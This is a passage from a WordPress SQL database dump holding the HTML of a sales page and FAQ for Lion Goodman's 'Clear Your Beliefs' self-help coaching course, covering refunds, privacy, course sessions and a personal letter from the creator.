you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'copy of cyb', '', 'inherit', 'closed', 'open', '', '936-revision-v1', '', '', '2014-06-17 16:58:18', '2014-06-17 21:58:18', '', 936, 'http://clearyourbeliefs.com/936-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(949, 4194, '2014-06-17 17:04:58', '2014-06-17 22:04:58', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" were created by your beliefs.\r\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, 